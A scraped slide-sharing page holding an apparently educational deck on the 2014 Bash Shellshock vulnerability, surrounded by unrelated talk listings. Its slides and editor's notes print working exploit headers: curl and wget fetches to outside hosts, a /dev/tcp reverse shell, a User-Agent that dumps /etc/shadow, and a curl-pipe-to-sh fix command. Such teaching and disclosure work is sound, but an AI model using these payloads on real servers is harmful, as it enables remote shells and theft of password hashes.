The document provides 40 methods for privilege escalation on Linux and Windows systems, organized into different categories. Some of the methods involve abusing privileges of programs run as root like sudo, abusing interpreters with escalated capabilities, injecting code through SQL or Windows services, exploiting scheduled tasks, sniffing network traffic, enumerating bash history files, and more. Many of the techniques require finding and exploiting vulnerable configurations or bugs in programs or services to elevate privileges on the target system.
document.pptx
A vulnerability was found in Apache HTTP Server versions 2.4.49 and 2.4.50 that allows path traversal and remote code execution attacks. The vulnerability can be exploited to access files outside the web server's document root or execute code if CGI is enabled. Updating to Apache HTTP Server version 2.4.51 resolves the issue. The vulnerability receives a CVSS v3 base score of 9.8 due to its ability to allow remote code execution with no authentication required.
Licão 14 debug script
This document discusses various ways to debug Bash scripts, including:
1. Using built-in debugging tools like the -x flag to trace script execution line-by-line or set -x/-+x to enable/disable debugging for portions.
2. Checking syntax without executing using set -n and preventing execution with set -o noexec.
3. Defining a DEBUG function to control custom debugging output instead of using built-in formats.
4. Modifying the shebang line to permanently enable debugging for the entire script.
The Bash Bug explained !
What is Bash?
Bash is the shell, a shell is a program that translates your commands into something the device's OS can understand or command language interpreter, for the operating system. The name is an acronym for the ‘Bourne-Again SHell’, a pun on Stephen Bourne, the author of the direct ancestor of the current Unix shell sh, which appeared in the Seventh Edition Bell Labs Research version of Unix. Bash is the default shell and is quite portable. It currently runs on nearly every version of UNIX and a few other operating.
Beautiful Bash: Let's make reading and writing bash scripts fun again!
This document discusses Beautiful Bash, a community-driven effort to promote best practices for writing Bash scripts. It outlines common bad coding styles, recommends modern approaches like testing and linting, and aims to create a definitive style guide through community contributions. The presenter argues that Bash is still widely used and can be developed defensively through techniques like testing, error handling, and modular functions.
Shell Shock
This document summarizes the ShellShock vulnerability in Bash, an arbitrary code execution flaw that existed undiscovered in Bash since 1992. Environment variables containing code were executed when passed between instances of Bash, allowing remote code execution. The vulnerability affected CGI scripts, SSH, DHCP services, and anything using Bash or vulnerable programming languages. A check command and examples of exploitation vectors are provided.
Porting your favourite cmdline tool to Android
Porting a command line tool to Android involves cross-compiling the code using the Android NDK toolchain, which may require patching the code to address issues like different file paths, endianness, and library dependencies. While compiling and running static binaries is straightforward, dynamic binaries require position-independent executable (PIE) support added in Android 5. Calling native executables from Android code requires using Runtime.exec() or ProcessBuilder and parsing output streams. Special care needs to be taken to avoid security issues like command injection when passing untrusted inputs to native programs run as root on Android.
Similar to The Shellshocker (15)
The bash vulnerability practical tips to secure your environment
The bash vulnerability practical tips to secure your environment
Beautiful Bash: Let's make reading and writing bash scripts fun again!
Beautiful Bash: Let's make reading and writing bash scripts fun again!
Recently uploaded
GNSS spoofing via SDR (Criptored Talks 2024)
In the realm of cybersecurity, offensive security practices act as a critical shield. By simulating real-world attacks in a controlled environment, these techniques expose vulnerabilities before malicious actors can exploit them. This proactive approach allows manufacturers to identify and fix weaknesses, significantly enhancing system security.
This presentation delves into the development of a system designed to mimic Galileo's Open Service signal using software-defined radio (SDR) technology. We'll begin with a foundational overview of both Global Navigation Satellite Systems (GNSS) and the intricacies of digital signal processing.
The presentation culminates in a live demonstration. We'll showcase the manipulation of Galileo's Open Service pilot signal, simulating an attack on various software and hardware systems. This practical demonstration serves to highlight the potential consequences of unaddressed vulnerabilities, emphasizing the importance of offensive security practices in safeguarding critical infrastructure.
Main news related to the CCS TSI 2023 (2023/1695)
An English 🇬🇧 translation of a presentation to the speech I gave about the main changes brought by CCS TSI 2023 at the biggest Czech conference on Communications and signalling systems on Railways, which was held in Clarion Hotel Olomouc from 7th to 9th November 2023 (konferenceszt.cz). Attended by around 500 participants and 200 on-line followers.
The original Czech 🇨🇿 version of the presentation can be found here: https://www.slideshare.net/slideshow/hlavni-novinky-souvisejici-s-ccs-tsi-2023-2023-1695/269688092 .
The videorecording (in Czech) from the presentation is available here: https://youtu.be/WzjJWm4IyPk?si=SImb06tuXGb30BEH .
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor Ivaniuk
At this talk we will discuss DDoS protection tools and best practices, discuss network architectures and what AWS has to offer. Also, we will look into one of the largest DDoS attacks on Ukrainian infrastructure that happened in February 2022. We'll see, what techniques helped to keep the web resources available for Ukrainians and how AWS improved DDoS protection for all customers based on Ukraine experience
Dandelion Hashtable: beyond billion requests per second on a commodity server
This slide deck presents DLHT, a concurrent in-memory hashtable. Despite efforts to optimize hashtables, that go as far as sacrificing core functionality, state-of-the-art designs still incur multiple memory accesses per request and block request processing in three cases. First, most hashtables block while waiting for data to be retrieved from memory. Second, open-addressing designs, which represent the current state-of-the-art, either cannot free index slots on deletes or must block all requests to do so. Third, index resizes block every request until all objects are copied to the new index. Defying folklore wisdom, DLHT forgoes open-addressing and adopts a fully-featured and memory-aware closed-addressing design based on bounded cache-line-chaining. This design offers lock-free index operations and deletes that free slots instantly, (2) completes most requests with a single memory access, (3) utilizes software prefetching to hide memory latencies, and (4) employs a novel non-blocking and parallel resizing. In a commodity server and a memory-resident workload, DLHT surpasses 1.6B requests per second and provides 3.5x (12x) the throughput of the state-of-the-art closed-addressing (open-addressing) resizable hashtable on Gets (Deletes).
Generating privacy-protected synthetic data using Secludy and Milvus
During this demo, the founders of Secludy will demonstrate how their system utilizes Milvus to store and manipulate embeddings for generating privacy-protected synthetic data. Their approach not only maintains the confidentiality of the original data but also enhances the utility and scalability of LLMs under privacy constraints. Attendees, including machine learning engineers, data scientists, and data managers, will witness first-hand how Secludy's integration with Milvus empowers organizations to harness the power of LLMs securely and efficiently.
What is an RPA CoE? Session 1 – CoE Vision
In the first session, we will review the organization's vision and how this has an impact on the COE Structure.
Topics covered:
• The role of a steering committee
• How do the organization’s priorities determine CoE Structure?
Speaker:
Chris Bolin, Senior Intelligent Automation Architect Anika Systems
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...
Folding is a recent technique for building efficient recursive SNARKs. Several elegant folding protocols have been proposed, such as Nova, Supernova, Hypernova, Protostar, and others. However, all of them rely on an additively homomorphic commitment scheme based on discrete log, and are therefore not post-quantum secure. In this work we present LatticeFold, the first lattice-based folding protocol based on the Module SIS problem. This folding protocol naturally leads to an efficient recursive lattice-based SNARK and an efficient PCD scheme. LatticeFold supports folding low-degree relations, such as R1CS, as well as high-degree relations, such as CCS. The key challenge is to construct a secure folding protocol that works with the Ajtai commitment scheme. The difficulty, is ensuring that extracted witnesses are low norm through many rounds of folding. We present a novel technique using the sumcheck protocol to ensure that extracted witnesses are always low norm no matter how many rounds of folding are used. Our evaluation of the final proof system suggests that it is as performant as Hypernova, while providing post-quantum security.
Paper Link: https://eprint.iacr.org/2024/257
Skybuffer SAM4U tool for SAP license adoption
Manage and optimize your license adoption and consumption with SAM4U, an SAP free customer software asset management tool.
SAM4U, an SAP complimentary software asset management tool for customers, delivers a detailed and well-structured overview of license inventory and usage with a user-friendly interface. We offer a hosted, cost-effective, and performance-optimized SAM4U setup in the Skybuffer Cloud environment. You retain ownership of the system and data, while we manage the ABAP 7.58 infrastructure, ensuring fixed Total Cost of Ownership (TCO) and exceptional services through the SAP Fiori interface.
June Patch Tuesday
Ivanti’s Patch Tuesday breakdown goes beyond patching your applications and brings you the intelligence and guidance needed to prioritize where to focus your attention first. Catch early analysis on our Ivanti blog, then join industry expert Chris Goettl for the Patch Tuesday Webinar Event. There we’ll do a deep dive into each of the bulletins and give guidance on the risks associated with the newly-identified vulnerabilities.
HCL Notes and Domino License Cost Reduction in the World of DLAU
Webinar Recording: https://www.panagenda.com/webinars/hcl-notes-and-domino-license-cost-reduction-in-the-world-of-dlau/
The introduction of DLAU and the CCB & CCX licensing model caused quite a stir in the HCL community. As a Notes and Domino customer, you may have faced challenges with unexpected user counts and license costs. You probably have questions on how this new licensing approach works and how to benefit from it. Most importantly, you likely have budget constraints and want to save money where possible. Don’t worry, we can help with all of this!
We’ll show you how to fix common misconfigurations that cause higher-than-expected user counts, and how to identify accounts which you can deactivate to save money. There are also frequent patterns that can cause unnecessary cost, like using a person document instead of a mail-in for shared mailboxes. We’ll provide examples and solutions for those as well. And naturally we’ll explain the new licensing model.
Join HCL Ambassador Marc Thomas in this webinar with a special guest appearance from Franz Walder. It will give you the tools and know-how to stay on top of what is going on with Domino licensing. You will be able lower your cost through an optimized configuration and keep it low going forward.
These topics will be covered
- Reducing license cost by finding and fixing misconfigurations and superfluous accounts
- How do CCB and CCX licenses really work?
- Understanding the DLAU tool and how to best utilize it
- Tips for common problem areas, like team mailboxes, functional/test users, etc
- Practical examples and best practices to implement right away
Crafting Excellence: A Comprehensive Guide to iOS Mobile App Development Serv...
Crafting Excellence: A Comprehensive Guide to iOS Mobile App Development Serv...Pitangent Analytics & Technology Solutions Pvt. Ltd
Discover top-tier mobile app development services, offering innovative solutions for iOS and Android. Enhance your business with custom, user-friendly mobile applications.Mutation Testing for Task-Oriented Chatbots
Conversational agents, or chatbots, are increasingly used to access all sorts of services using natural language. While open-domain chatbots - like ChatGPT - can converse on any topic, task-oriented chatbots - the focus of this paper - are designed for specific tasks, like booking a flight, obtaining customer support, or setting an appointment. Like any other software, task-oriented chatbots need to be properly tested, usually by defining and executing test scenarios (i.e., sequences of user-chatbot interactions). However, there is currently a lack of methods to quantify the completeness and strength of such test scenarios, which can lead to low-quality tests, and hence to buggy chatbots.
To fill this gap, we propose adapting mutation testing (MuT) for task-oriented chatbots. To this end, we introduce a set of mutation operators that emulate faults in chatbot designs, an architecture that enables MuT on chatbots built using heterogeneous technologies, and a practical realisation as an Eclipse plugin. Moreover, we evaluate the applicability, effectiveness and efficiency of our approach on open-source chatbots, with promising results.
The Microsoft 365 Migration Tutorial For Beginner.pptx
This presentation will help you understand the power of Microsoft 365. However, we have mentioned every productivity app included in Office 365. Additionally, we have suggested the migration situation related to Office 365 and how we can help you.
You can also read: https://www.systoolsgroup.com/updates/office-365-tenant-to-tenant-migration-step-by-step-complete-guide/
Freshworks Rethinks NoSQL for Rapid Scaling & Cost-Efficiency
Freshworks creates AI-boosted business software that helps employees work more efficiently and effectively. Managing data across multiple RDBMS and NoSQL databases was already a challenge at their current scale. To prepare for 10X growth, they knew it was time to rethink their database strategy. Learn how they architected a solution that would simplify scaling while keeping costs under control.
Leveraging the Graph for Clinical Trials and Standards
Katja Glaß
OpenStudyBuilder Community Manager - Katja Glaß Consulting
Marius Conjeaud
Principal Consultant - Neo4j
Northern Engraving | Nameplate Manufacturing Process - 2024
Manufacturing custom quality metal nameplates and badges involves several standard operations. Processes include sheet prep, lithography, screening, coating, punch press and inspection. All decoration is completed in the flat sheet with adhesive and tooling operations following. The possibilities for creating unique durable nameplates are endless. How will you create your brand identity? We can help!
AppSec PNW: Android and iOS Application Security with MobSF
Mobile Security Framework - MobSF is a free and open source automated mobile application security testing environment designed to help security engineers, researchers, developers, and penetration testers to identify security vulnerabilities, malicious behaviours and privacy concerns in mobile applications using static and dynamic analysis. It supports all the popular mobile application binaries and source code formats built for Android and iOS devices. In addition to automated security assessment, it also offers an interactive testing environment to build and execute scenario based test/fuzz cases against the application.
This talk covers:
Using MobSF for static analysis of mobile applications.
Interactive dynamic security assessment of Android and iOS applications.
Solving Mobile app CTF challenges.
Reverse engineering and runtime analysis of Mobile malware.
How to shift left and integrate MobSF/mobsfscan SAST and DAST in your build pipeline.
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
Webinar Recording: https://www.panagenda.com/webinars/hcl-notes-und-domino-lizenzkostenreduzierung-in-der-welt-von-dlau/
DLAU und die Lizenzen nach dem CCB- und CCX-Modell sind für viele in der HCL-Community seit letztem Jahr ein heißes Thema. Als Notes- oder Domino-Kunde haben Sie vielleicht mit unerwartet hohen Benutzerzahlen und Lizenzgebühren zu kämpfen. Sie fragen sich vielleicht, wie diese neue Art der Lizenzierung funktioniert und welchen Nutzen sie Ihnen bringt. Vor allem wollen Sie sicherlich Ihr Budget einhalten und Kosten sparen, wo immer möglich. Das verstehen wir und wir möchten Ihnen dabei helfen!
Wir erklären Ihnen, wie Sie häufige Konfigurationsprobleme lösen können, die dazu führen können, dass mehr Benutzer gezählt werden als nötig, und wie Sie überflüssige oder ungenutzte Konten identifizieren und entfernen können, um Geld zu sparen. Es gibt auch einige Ansätze, die zu unnötigen Ausgaben führen können, z. B. wenn ein Personendokument anstelle eines Mail-Ins für geteilte Mailboxen verwendet wird. Wir zeigen Ihnen solche Fälle und deren Lösungen. Und natürlich erklären wir Ihnen das neue Lizenzmodell.
Nehmen Sie an diesem Webinar teil, bei dem HCL-Ambassador Marc Thomas und Gastredner Franz Walder Ihnen diese neue Welt näherbringen. Es vermittelt Ihnen die Tools und das Know-how, um den Überblick zu bewahren. Sie werden in der Lage sein, Ihre Kosten durch eine optimierte Domino-Konfiguration zu reduzieren und auch in Zukunft gering zu halten.
Diese Themen werden behandelt
- Reduzierung der Lizenzkosten durch Auffinden und Beheben von Fehlkonfigurationen und überflüssigen Konten
- Wie funktionieren CCB- und CCX-Lizenzen wirklich?
- Verstehen des DLAU-Tools und wie man es am besten nutzt
- Tipps für häufige Problembereiche, wie z. B. Team-Postfächer, Funktions-/Testbenutzer usw.
- Praxisbeispiele und Best Practices zum sofortigen Umsetzen
Columbus Data & Analytics Wednesdays - June 2024
Columbus Data & Analytics Wednesdays, June 2024 with Maria Copot 20
Recently uploaded (20)
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor Ivaniuk
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor Ivaniuk
Dandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity server
Generating privacy-protected synthetic data using Secludy and Milvus
Generating privacy-protected synthetic data using Secludy and Milvus
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...
HCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAU
Crafting Excellence: A Comprehensive Guide to iOS Mobile App Development Serv...
Crafting Excellence: A Comprehensive Guide to iOS Mobile App Development Serv...
The Microsoft 365 Migration Tutorial For Beginner.pptx
The Microsoft 365 Migration Tutorial For Beginner.pptx
Freshworks Rethinks NoSQL for Rapid Scaling & Cost-Efficiency
Freshworks Rethinks NoSQL for Rapid Scaling & Cost-Efficiency
Leveraging the Graph for Clinical Trials and Standards
Leveraging the Graph for Clinical Trials and Standards
Northern Engraving | Nameplate Manufacturing Process - 2024
Northern Engraving | Nameplate Manufacturing Process - 2024
AppSec PNW: Android and iOS Application Security with MobSF
AppSec PNW: Android and iOS Application Security with MobSF
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
Nordic Marketo Engage User Group_June 13_ 2024.pptx
Nordic Marketo Engage User Group_June 13_ 2024.pptx
The Shellshocker
- 1. Sharath Unni @haxorhead http://hackabab.com/shellshock/
- 2. DISCOVERY Stéphane Chazelas discovered the bug on 12 September 2014, told a few and publicly announced on 24th Sept CVE-2014-6271 By 25th Sept, botnets had sprung up performing DDoS. By 26th Sept, a botnet called “wopbot”, was being used DDoS attack against Akamai Technologies and to scan the US DoD.
- 3. BACKGROUND Affects Bash up to version 4.3 Patch 26 Analysis of the source code shows the bug existed as early as 1.13 in 1992 Each program running under Unix like OS has access to a list of env variables. These are passed to new programs started by the parent. Bash maintains a list of functions, callable only from within Bash. Bash can exec itself. Exporting env variables and func defs.
- 4. BACKGROUND Exported functions def begin with () in the new bash’s env var list. New bash reads the value of the env var list and converts them back to functions This conversion is done by executing code from the value, creating the func on the fly. Vulnerable versions of bash do not check if the value contains only func def Passing a func value & code will cause code to be called as well
- 5. CVE-2014-6271 First bug - Stéphane Chazelas env x='() { :;}; echo vulnerable' bash -c "date“ Breakdown () { :; }; - Empty environment variable declaration /bin/bash –c - Call into Bash and pass a string with a command echo vulnerable – command that ideally should not be executed
- 6. CVE-2014-6277 • Discovered by Michał Zalewski bash -c "f() { x() { _;}; x() { _;} <<a; }" 2>/dev/null || echo vulnerable
- 7. CVE-2014-7169 Third bug – Tavis Ormandy It was found that the fix for CVE-2014-6271 was incomplete, and Bash still allowed certain characters to be injected into other environments via specially crafted environment variables. env X='() { (a)=>' bash -c "echo date"; cat echo ; rm -f echo
- 8. UNKNOWN CVE Fourth bug env -i X=' () { }; echo hello' bash -c 'date' Demo
- 9. ATTACK SCENARIOS Automated Click Fraud – Blackhat SEO Accept: () { :;}; /bin/bash -c "curl http://31.41.42[.]109/search/wphp/j.php?cgi=XXX" User-Agent: () { :;}; /bin/bash -c "wget -q -O /dev/null http://ad.dipad[.]biz/test/http://XXXXXX.com/“5
- 10. ATTACK SCENARIOS dev/tcp reverse shell GET /cgi-bin/ HTTP/1.1 Host: x.x.x.x User-Agent: () { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/handler-ip/3333 0>&1'
- 11. ATTACK SCENARIOS Data theft GET /cgi-bin/status.cgi HTTP/1.0 User-Agent: () { :;}; echo "Bag:" $(</etc/shadow)
- 12. FIXES Patch 27 - https://ftp.gnu.org/gnu/bash/bash-4.3-patches/ curl https://shellshocker.net/fixbash | sh
- 13. THANK YOU! @haxorhead http://www.hackabab.com/
Editor's Notes
- Reference: http://www.pcworld.com/article/2687763/safe-from-shellshock-how-to-protect-your-home-computer-from-the-bash-shell-bug.html
- env x='() { :;}; echo vulnerable' bash -c “date”
- env x=‘bash -c "f() { x() { _;}; x() { _;} <<a; }" 2>/dev/null || echo vulnerable’
- env X='() { (a)=>\' bash -c "echo date"; cat echo ; rm -f echo
- Reverse shell: User-Agent: () { :; }; /bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.133.160/3333 0>&1'
- Data theft: User-Agent: () { :;}; echo "Bag:" $(</etc/shadow)
- Data theft: User-Agent: () { :;}; echo "Bag:" $(</etc/shadow)